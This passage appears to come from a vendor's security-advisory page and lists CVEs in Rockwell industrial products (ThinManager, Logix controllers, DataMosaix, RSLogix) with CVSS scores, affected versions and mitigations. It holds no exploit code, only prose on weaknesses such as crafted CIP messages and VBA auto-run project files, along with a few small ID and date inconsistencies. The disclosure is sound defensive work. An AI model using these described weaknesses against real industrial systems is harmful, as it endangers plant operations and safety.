First Known in Software Version

Corrected in Software Version

 

FactoryTalk® Updater – Web Client

 

CVE-2024-10943

v4.00.00

v4.20.00

 

FactoryTalk® Updater – Client

 

CVE-2024-10944

All version

V4.20.00

 

FactoryTalk® Updater – Agent

 

CVE-2024-10945

All version

 

V4.20.00

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-10943 IMPACT

An authentication bypass vulnerability exists in the affected product. The vulnerability exists due to shared secrets across accounts and could allow a threat actor to impersonate a user if the threat actor is able to enumerate additional information required during authentication.

CVSS 3.1 Base Score: 9.1
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

CVSS 4.0 Base Score: 9.1
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

CWE:  CWE-922: Insecure Storage of Sensitive Information
Known Exploited Vulnerability (KEV) database: No

CVE-2024-10944 IMPACT

A Remote Code Execution vulnerability exists in the affected product. The vulnerability requires a high level of permissions and exists due to improper input validation resulting in the possibility of a malicious Updated Agent being deployed.

CVSS 3.1 Base Score: 8.4
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.1
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

CWE:  CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         Control access to the server where FactoryTalk® Updater is running.

·         Click the ‘Scan’ button, which will update the database

CVE-2024-10945 IMPACT

A Local Privilege Escalation vulnerability exists in the affected product. The vulnerability requires a local, low privileged threat actor to replace certain files during update and exists due to a failure to perform proper security checks before installation.

CVSS 3.1 Base Score: 7.3
CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 7.0
CVSS 4.0 Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-358: Improperly Implemented Security Check for Standard
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

Critical
SD1708 | ThinManager® Multiple Vulnerabilities
Published Date:
October 25, 2024
Last Updated:
October 25, 2024
CVE IDs:
CVE-2024-10386, CVE-2024-10387
Products:
FactoryTalk ThinManager
CVSS Scores (v3.1):
9.8, 7.5
CVSS Scores (v4.0):
9.3, 8.7
Revision Number:
1
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

ThinManager® Multiple Vulnerabilities

Published Date: 10/25/2024 
Last Updated: 10/25/2024 
Revision Number: 1.0 
CVSS Score: Multiple, see below

AFFECTED PRODUCTS AND SOLUTION

Affected Product Affected Version(s) Corrected Version(s)
ThinManager® 

11.2.0-11.2.9

12.0.0-12.0.7

12.1.0-12.1.8

13.0.0-13.0.5

13.1.0-13.1.3

13.2.0-13.2.2

14.0.0

 

11.2.10 

12.0.8 

12.1.9 

13.0.6

13.1.4

13.2.3

14.0.1

Available here: ThinManager Downloads | ThinManager ®

 

VULNERABILITY DETAILS

The security of our products is important to us as your chosen industrial automation supplier. Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities. These vulnerabilities were discovered and reported to Rockwell Automation by security researchers at Tenable Network Security.

CVE-2024-10386 IMPACT

An authentication vulnerability exists in the affected product. The vulnerability could allow a threat actor with network access to send crafted messages to the device, potentially resulting in database manipulation.

CVSS 3.1 Base Score: 9.8 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE-306: Missing Authentication for Critical Function 
Known Exploited Vulnerability (KEV) database: No

CVE-2024-10387 IMPACT

A Denial-of-Service vulnerability exists in the affected product. The vulnerability could allow a threat actor with network access to send crafted messages to the device, potentially resulting in Denial-of-Service.

CVSS 3.1 Base Score: 7.5 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE-125: Out-of-bounds Read 
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers using the affected software are encouraged to apply these risk mitigations, if possible.

  • If able, navigate to the ThinManager® download site and upgrade to a corrected version of ThinManager® .

  • Implement network hardening for ThinManager® Device(s) by limiting communications to TCP 2031 to only the devices that require connection to the ThinManager® .

  • For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

High
SD1707 | ControlLogix Vulnerable to Denial of Service via CIP Messages
Published Date:
October 10, 2024
Last Updated:
October 10, 2024
CVE IDs:
CVE-2024-6207
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Revision Number:
1.0
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: October 10, 2024 
Last updated: October 10, 2024
Revision Number: 1.0
CVSS Score: v3.1: 7.5, v4.0: 8.7 
 

AFFECTED PRODUCTS AND SOLUTION

Affected Product
 First Known in firmware revision Corrected in firmware revision
ControlLogix® 5580 V28.011 V33.017, V34.014, V35.013, V36.011 and later
ControlLogix® 5580 Process V33.011 V33.017, V34.014, V35.013, V36.011 and later
GuardLogix 5580 V31.011  V33.017, V34.014, V35.013, V36.011 and later
CompactLogix 5380 V28.011  V33.017, V34.014, V35.013, V36.011 and later
Compact GuardLogix 5380 SIL 2 V31.011 V33.017, V34.014, V35.013, V36.011 and later
Compact GuardLogix 5380 SIL 3 V32.013 V33.017, V34.014, V35.013, V36.011 and later
CompactLogix 5480 V32.011 V33.017, V34.014, V35.013, V36.011 and later
FactoryTalk® Logix Echo  V33.011 V34.014, V35.013, V36.011 and later

 

VULNERABILITY DETAILS

Rockwell Automation used version 3.1 and 4.0 of the CVSS scoring system to assess the following vulnerabilities. The following vulnerability was reported to Rockwell Automation by Trevor Flynn.

CVE-2024-6207 IMPACT

A denial-of-service vulnerability exists in the affected products that will cause the device to result in a major nonrecoverable fault (MNRF) when it receives an invalid CIP request. To exploit this vulnerability a malicious user must chain this exploits with CVE 2021-22681 and send a specially crafted CIP message to the device.  If exploited, a threat actor could help prevent access to the legitimate user and end connections to connected devices including the workstation.  To recover the controllers, a download is required which ends any process that the controller is running. 

CVSS Base Score v3.1: 7.5/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 

 

CVSS Base Score v4.0: 8.7/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: CWE-20: Improper Input Validation

 

Known Exploited Vulnerability (KEV) database:  No

 

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

Mitigations and Workarounds 

Users using the affected software are also encouraged to apply security best practices to minimize the risk of vulnerability. 

 

 ADDITIONAL RESOURCES

High
SD1705 | PowerFlex 6000T CIP Security denial-of-service Vulnerability
Published Date:
October 07, 2024
Last Updated:
October 07, 2024
CVE IDs:
CVE-2024-9124
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 10/8/2024

Last Updated: 10/8/2024 

Revision Number: 1.0 
CVSS Score: 8.2/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improving your business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product
 Affected Software Version Corrected in Software Version
Drives - PowerFlex 6000T 8.001, 8.002, 9.001 10.001

 

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-9124 IMPACT

A denial-of-service vulnerability exists in the PowerFlex® 6000T. If the device is overloaded with requests, it will become unavailable. The device may require a power cycle to recover it if it does not re-establish a connection after it stops receiving requests. 

CVSS 3.1 Base Score: 7.5 
CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.2 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE:  Improper Check for Unusual or Exceptional Conditions 
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.    

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

High
SD1706 | Logix Controllers Vulnerable to Denial-of-Service Vulnerability
Published Date:
October 07, 2024
Last Updated:
October 10, 2024
CVE IDs:
CVE-2024-8626
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Revision Number:
2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Logix Controllers Vulnerable to Denial-of-Service Vulnerability

Published Date: October 8, 2024

Last updated:  October 10, 2024

Revision Number: 2.0

CVSS Score: 8.7/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product First Known in Firmware Revision Corrected in Firmware Revision
CompactLogix 5380 controllers v33.011<

  • v33.015 and later for versions 33

  • v34.011 and later
Compact GuardLogix® 5380 controllers v33.011<
CompactLogix 5480 controllers v33.011<
ControlLogix 5580 controllers v33.011<
GuardLogix 5580 controllers v33.011<
1756-EN4TR v3.002

  • 4.001 and later

Mitigations and Workarounds 

Customers using the affected versions are encouraged to upgrade to corrected firmware versions. We also strongly encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability. 

VULNERABILITY DETAILS

CVE-2024-8626 IMPACT

Due to a memory leak, a denial-of-service vulnerability exists in the affected products. A malicious actor could exploit this vulnerability by performing multiple actions on certain web pages of the product causing the affected products to become fully unavailable and require a power cycle to recover. 

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.  

CVSS Base Score: 7.5/10 (high) 

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS Base Score: 8.7/10 (high)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: 400 – Uncontrolled Resource Consumption 

ADDITIONAL RESOURCES

Medium
SD1704 | Improper Authorization Vulnerability in Verve® Asset Manager
Published Date:
October 04, 2024
Last Updated:
October 04, 2024
CVE IDs:
CVE-2024-9412
CVSS Scores (v3.1):
6.8
CVSS Scores (v4.0):
8.4
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 10/8/24

Last updated: 10/8/24

Revision Number: 1.0

CVSS Score: v3.1: 6.8, v4.0: 8.4

 

AFFECTED PRODUCTS AND SOLUTION

 

 

Affected Product

 

 

 

 

Affected Versions

 

 

 

 

Corrected in software version

 

 

 

 

Verve® Asset Manager 

 

 

 

 

All versions < 1.38

 

 

 

 

V1.38

 

 

 

VULNERABILITY DETAILS 

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

 

 CVE-2024-9412 IMPACT

An improper authorization vulnerability exists in the affected products that could allow an unauthorized user to sign in. While removal of all role mappings is unlikely, it could occur in the case of unexpected or accidental removal by the administrator. If exploited, an unauthorized user could access data they previously but should no longer have access to.  

 

CVSS Base Score v3.1: 6.8/10

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

 

CVSS Base Score v4.0: 8.4/10

CVSS Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: CWE-842: Placement of User into Incorrect Group 

Known Exploited Vulnerability (KEV) database:  No

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

Mitigations and Workarounds 

Customers using the affected software are encouraged to apply the risk mitigations, if possible. Additionally, we encourage customers to implement our suggested security best practices to minimize the risk of vulnerability.  

  • The presence of any mappings will help prevent this vulnerability from being exploited. If all mappings must be removed, manually removing previously mapped users is an effective workaround.

 

 ADDITIONAL RESOURCES

·       JSON CVE-2024-9412

 

Critical
SD1703 | DataMosaix™ Private Cloud third-party Vulnerabilities
Published Date:
October 04, 2024
Last Updated:
October 04, 2024
CVE IDs:
CVE-2019-14855, CVE-2019-17543, CVE-2019-18276, CVE-2019-19244, CVE-2019-989, CVE-2019-9923
CVSS Scores (v3.1):
7.5, 8.1, 7.8, 7.5, 9.8, 7.5
CVSS Scores (v4.0):
9.3, 8.7, 9.3, 8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 10/8/24

Revision Number: 1.0

CVSS Score: 3.1: 7.5, 8.1, 7.8, 9.8 4.0: 8.7, 9.3

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product Affected Product Affected Versions

DataEdgePlatform

DataMosaix™ Private Cloud <=7.07 v7.09

VULNERABILITY DETAILS

Rockwell Automation used the latest versions of the CVSS scoring system to assess the following vulnerabilities.

CVE-2019-14855 IMPACT

The affected product utilizes GnuPG which contains a certificate signature vulnerability found in the SHA-1 algorithm. A threat actor could use this weakness to create forged certificate signatures. If exploited, a malicious user could view customer data.

CVSS 3.1 Base Score: 7.5 CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE: Dependency on Vulnerable third-party Component Known Exploited Vulnerability (KEV) database: No

CVE-2019-17543 IMPACT

The affected product utilizes LZ4 which contains a heap-based buffer overflow vulnerability in versions before 1.9.2 (related to LZ4_compress_destSize), that affects applications that call LZ4_compress_fast with a large input. This issue can also lead to data corruption. NOTE: the vendor states "only a few specific / uncommon usages of the API are at risk." If exploited, a malicious actor could perform a remote code execution.

CVSS 3.1 Base Score: 8.1 CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3 CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: Dependency on Vulnerable third-party Component Known Exploited Vulnerability (KEV) database: No

CVE-2019-18276 IMPACT

The affected product utilizes shell.c which contains a vulnerability in disable_priv_mode in shell.c in GNU Bash through 5.0 patch 11. A threat actor with command execution in the shell can use "enable -f" for runtime loading to gain privileges. If exploited, a malicious actor could perform a remote code execution.

CVSS 3.1 Base Score: 7.8 CVSS 3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE: Dependency on Vulnerable third-party Component Known Exploited Vulnerability (KEV) database: No

CVE-2019-19244 IMPACT

The affected product utilizes SQLite 3.30.1 which contains a vulnerability in sqlite3Select in select.c that allows a crash if a subselect uses both DISTINCT and window functions and has certain ORDER BY usage. If exploited, a malicious actor could perform a denial-of-service, which would require the use to restart the software to recover it.

CVSS 3.1 Base Score: 7.5 CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7 CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: Dependency on Vulnerable third-party Component Known Exploited Vulnerability (KEV) database: No

CVE-2019-9893 IMPACT

The affected product utilizes libseccomp, which contains a vulnerability in versions 2.4.0 and earlier that does not correctly generate 64-bit syscall argument comparisons using the arithmetic operators (LT, GT, LE, GE). This vulnerability could lead to bypassing seccomp filters and potential privilege escalations. If exploited, a malicious actor could perform a remote code execution.

CVSS 3.1 Base Score: 9.8 CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.3 CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE: Dependency on Vulnerable third-party Component Known Exploited Vulnerability (KEV) database: No

CVE-2019-9923 IMPACT

The affected product utilizes GNU Tar, which contains a vulnerability in pax_decode_header in sparse.c in versions before 1.32. pax_decode_header has a NULL pointer dereference when parsing certain archives that have malformed extended headers. If exploited, a malicious actor could perform a denial-of-service, which would require the use to restart the software to recover it.

CVSS 3.1 Base Score: 7.5 CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7 CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE: Dependency on Vulnerable third-party Component Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds Customers using the affected software are encouraged to apply the risk mitigations, if possible.

· For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability. Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

 

 

High
SD1702 | Sensitive Data Exposure and Escalating Privileges Vulnerabilities in DataMosaix™ Private Cloud
Published Date:
October 04, 2024
Last Updated:
October 04, 2024
CVE IDs:
CVE-2024-7952, CVE-2024-7953, CVE-2024-7956
CVSS Scores (v3.1):
7.5, 8.8, 8.1
CVSS Scores (v4.0):
7.5, 8.7, 7.6
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 10/8/24 

Revision Number: 1.0 
CVSS Score: v3.1: 7.5, 8.8 v4.0: 8.7

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product
 Affected Versions 
 Corrected in Software Version
DataEdgePlatform DataMosaix™ Private Cloud <=7.07 v7.09

 

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-7952 IMPACT

A data exposure vulnerability exists in the affected product. There are hardcoded links in the source code that lead to JSON files that can be reached without authentication. If exploited, a threat actor could view customer data. 

CVSS 3.1 Base Score: 7.5 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS 4.0 Base Score: 8.7 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

CWE:  Exposure of Sensitive Information to an unauthorized Actor 
Known Exploited Vulnerability (KEV) database: No

CVE-2024-7953 IMPACT

 
A vulnerability exists in the affected products that allows a threat actor to create a project and become the administrator for it. If exploited, a threat actor could create, modify, and delete their own project. 

CVSS 3.1 Base Score: 8.8 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.7 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  Missing Authorization 
Known Exploited Vulnerability (KEV) database: No

CVE-2024-7956 IMPACT 

A vulnerability exists in the affected products that allows a threat actor to gain access to user’s projects. To exploit this vulnerability the threat actor must have basic user privileges. If exploited, the threat actor can modify and delete the project. 

CVSS 3.1 Base Score: 8.1 
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CVSS 4.0 Base Score: 7.6 
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N

CWE:  Incorrect Authorization 
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds 
Customers using the affected software, who are not able to upgrade to one of the corrected versions, are encouraged to apply security best practices, where possible.    

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

High
SD1701 | RSLogix™ 5 and RSLogix 500® Remote Code Execution Via VBA Embedded Script
Published Date:
September 16, 2024
Last Updated:
October 14, 2024
CVE IDs:
CVE-2024-7847
CVSS Scores (v3.1):
7.7
CVSS Scores (v4.0):
8.8
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
Yes
Más información Less Details Chevron DownChevron Down

Published Date: September 19, 2024

Last updated:  September 19, 2024

Revision Number: 1.0

CVSS Score: v3.1: 7.7/10, v4.0: 8.8/10

AFFECTED PRODUCTS AND SOLUTION

Affected Product

Affected software version

Corrected in software version

RSLogix 500®

All

n/a

RSLogix™ Micro Developer and Starter

All

n/a

RSLogix™ 5

 All
 n/a

 

Mitigations and Workarounds 

Users using the affected software are encouraged to apply the following mitigations and security best practices, where possible. 

·       Deny the execution feature in FactoryTalk® Administration Console, when not needed, by navigating to “Policies”, selecting ‘”Enable/Disable VBA”, and then checking the “Deny” box to block VBA code execution.

·       Save project files in a Trusted® location where only administrators can modify it and verify file integrity.

·       Utilize the VBA editor protection feature, which locks the VBA code from viewing and editing by setting a password.

VULNERABILITY DETAILS

Rockwell Automation used the latest versions of the CVSS scoring system to assess the following vulnerabilities. The following vulnerabilities were reported to us by Sharon Brizinov of Claroty Research - Team82. 

A feature in the affected products enables users to prepare a project file with an embedded VBA script and can be configured to run once the project file has been opened without user intervention.  This feature can be abused to trick a legitimate user into executing malicious code upon opening an infected RSP/RSS project file. If exploited, a threat actor may be able to perform a remote code execution. Connected devices may also be impacted by exploitation of this vulnerability.

CVE-2024-7847 IMPACT

CVSS Base Score 3.1: 7.7/10

CVSS Vector String 3.1: CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H

CVSS Base Score 4.0: 8.8/10

CVSS Vector String 4.0: CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

CWE: CWE-345 (Insufficient verification of data authenticity)

Known Exploited Vulnerability (KEV) database:  No

Users can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

 

ADDITIONAL RESOURCES

The following link provides CVE information in Vulnerability Exploitability Exchange (VEX) format, which is machine readable and can be used to automate vulnerability management and tracking activities.     

High
SD1699 | 5015-U8IHFT Denial-of-Service Vulnerability via CIP Message
Published Date:
September 12, 2024
Last Updated:
November 11, 2024
CVE IDs:
CVE-2024-45825
CVSS Scores (v3.1):
7.5
CVSS Scores (v4.0):
8.7
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 7.5/10, v4.0: 8.7/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

 Affected Software Versions

Corrected in Software Version

5015-U8IHFT

V1.011 and V1.012

V2.011

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-45825 IMPACT

A denial-of-service vulnerability exists in the affected products. The vulnerability occurs when a malformed CIP packet is sent over the network to the device and results in a major nonrecoverable fault causing a denial-of-service.

CVSS 3.1 Base Score: 7.5
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS 4.0 Base Score: 8.7
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-20: Improper Input Validation
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         Block communication to CIP class 883 if it is not required

·         Block communication to CIP class 67 if it is not required

·         Enforce proper network segmentation and routing controls

·         For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

·         JSON CVE-2024-45825

Critical
SD1698 | FactoryTalk® Batch View™ Authentication Bypass Vulnerability via shared secrets
Published Date:
September 12, 2024
Last Updated:
November 11, 2024
CVE IDs:
CVE-2024-45823
CVSS Scores (v3.1):
8.1
CVSS Scores (v4.0):
9.2
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 8.1/10, v4.0: 9.2/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

 Affected Software Versions

Corrected in Software Version

FactoryTalk® Batch View™

2.01.00

3.00.00

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-45823 IMPACT

An authentication bypass vulnerability exists in the affected product. The vulnerability exists due to shared secrets across accounts and could allow a threat actor to impersonate a user if the threat actor is able to enumerate additional information required during authentication.

CVSS 3.1 Base Score: 8.1
CVSS 3.1 Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 9.2
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-287: Improper Authentication
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

·         JSON CVE-2024-45823

High
SD1700 | ThinManager® Code Execution Vulnerability
Published Date:
September 12, 2024
Last Updated:
November 11, 2024
CVE IDs:
CVE-2024-45826
CVSS Scores (v3.1):
6.8
CVSS Scores (v4.0):
8.5
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 6.8/10, v4.0: 8.5/10

The security of our products is important to us as your chosen industrial automation supplier. This anomaly was found internally during routine testing and is being reported based on our commitment to customer transparency and to improve their business or production environments.

AFFECTED PRODUCTS AND SOLUTION

Affected Product

Affected Software Versions

Corrected in Software Version

ThinManager®

V13.1.0 - 13.1.2

V13.2.0 - 13.2.1

V13.1.3

V13.2.2

VULNERABILITY DETAILS

Rockwell Automation used the latest version of the CVSS scoring system to assess the following vulnerabilities.

CVE-2024-45826 IMPACT

Due to improper input validation, a path traversal and remote code execution vulnerability exists when the ThinManager® processes a crafted POST request. If exploited, a user can install an executable file.

CVSS 3.1 Base Score: 6.8
CVSS 3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H

CVSS 4.0 Base Score: 8.5
CVSS 4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CWE:  CWE-610: Externally Controlled Reference to a Resource in Another Sphere
Known Exploited Vulnerability (KEV) database: No

Mitigations and Workarounds
Customers using the affected software are encouraged to apply the risk mitigations, if possible.

·         For information on how to mitigate Security Risks on industrial automation control systems, we encourage customers to implement our suggested security best practices to minimize the risk of the vulnerability.

Customers can use Stakeholder-Specific Vulnerability Categorization to generate more environment-specific prioritization.

ADDITIONAL RESOURCES

·         JSON CVE-2024-45826

High
SD1697 | AADvance® Trusted® SIS Workstation contains multiple 7-ZIP Vulnerabilities
Published Date:
September 12, 2024
Last Updated:
November 11, 2024
CVE IDs:
CVE-2023-31102, CVE-2023-40481
CVSS Scores (v3.1):
7.8
Known Exploited Vulnerability (KEV):
No
Corrected:
Yes
Workaround:
No
Más información Less Details Chevron DownChevron Down

Published Date: 9/12/2024
Last Updated: 9/12/2024
Revision Number: 1.0
CVSS Score: v3.1: 7.8/10

